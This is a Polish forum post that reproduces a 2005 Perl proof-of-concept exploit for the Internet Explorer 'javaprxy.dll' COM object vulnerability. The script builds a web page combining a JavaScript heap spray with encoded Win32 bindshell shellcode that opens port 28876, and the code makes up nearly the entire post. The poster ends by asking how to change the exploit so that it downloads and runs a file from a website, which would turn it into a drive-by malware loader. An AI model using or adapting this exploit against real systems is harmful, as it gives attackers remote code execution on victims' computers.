Microsoft Internet Explorer "javaprxy.dll"

W

wrna

Użytkownik
Dołączył
Wrzesień 19, 2005
Posty
7
Kod: 
#!/usr/bin/perl

######################################################

# 

# Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched-

#

# Proof of Concept by the FrSIRT < [url]http://www.frsirt.com[/url] / [email][email protected][/email] >

#       Bindshell on port 28876 - Based on Berend-Jan Wever's IE exploit

#                                            01 July 2005

#

# Description - [url]http://www.frsirt.com/english/advisories/2005/0935[/url]

# Workarounds - [url]http://www.microsoft.com/technet/security/advisory/903144.mspx[/url]

# sec-consult - [url]http://www.sec-consult.com/184.html[/url]

# 

# Solution :

# Set Internet and Local intranet security zone settings to "High" or use

# another browser until a patch is released.

#

# Tested on : 

# Internet Explorer 6 on Microsoft Windows XP SP2

# Internet Explorer 6 on Microsoft Windows XP SP1

#

# Affected versions : 

# Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3

# Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4

# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3

# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4

# Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1

# Internet Explorer 6 for Microsoft Windows XP Service Pack 2

# Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium)

# Internet Explorer 6 for Microsoft Windows Server 2003

# Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1

# Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems

# Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium

# Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)

# Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition

# Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition

# Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition

# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98

# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE

# Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition 

# 

# Usage : perl iejavaprxyexploit.pl > mypage.html

# 

######################################################

#

# This program is free software; you can redistribute it and/or modify it under

# the terms of the GNU General Public License version 2, 1991 as published by

# the Free Software Foundation.

# 

# This program is distributed in the hope that it will be useful, but WITHOUT

# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS

# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more

# details.

# 

# A copy of the GNU General Public License can be found at:

# [url]http://www.gnu.org/licenses/gpl.html[/url]

# or you can write to:

# Free Software Foundation, Inc.

# 59 Temple Place - Suite 330

# Boston, MA 02111-1307

# USA.

#

######################################################



# header

my $header = "<html><body>n<SCRIPT language="javascript">n";



# Win32 bindshell (port 28876) - SkyLined

my $shellcode = "shellcode = unescape("%u4343"+"%u4343"+"%u43eb".

"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".

"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".

"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".

"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".

"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".

"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".

"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".

"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".

"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".

"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".

"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".

"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".

"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".

"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".

"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".

"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".

"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".

"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");n";



# Memory 

my $code = "bigblock = unescape("%u0D0D%u0D0D");n".

"headersize = 20;n".

"slackspace = headersize+shellcode.lengthn".

"while (bigblock.length<slackspace) bigblock+=bigblock;n".

"fillblock = bigblock.substring(0, slackspace);n".

"block = bigblock.substring(0, bigblock.length-slackspace);n".

"while(block.length+slackspace<0x40000) block = block+block+fillblock;n".

"memory = new Array();n".

"for (i=0;i<750;i++) memory[i] = block + shellcode;n".

"</SCRIPT>n";



# javaprxy.dll 

my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; 



# footer

my $footer = "<object classid="CLSID:".$clsid.""></object>n".

"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploitn".

"by the FrSIRT < [url]http://www.frsirt.com[/url] >n".

"Solution - http://www.frsirt.com/english/advisories/2005/0935".

"</body><script>location.reload();</script></html>";



# print "Content-Type: text/html;rnrn"; # if you are in cgi-bin

print "$header $shellcode $code $footer";


Czy da sie przerobic tego exploita tak zeby sciagal i uruchamial plik ze strony ?
 
You must log in or register to reply here.
Do góry Bottom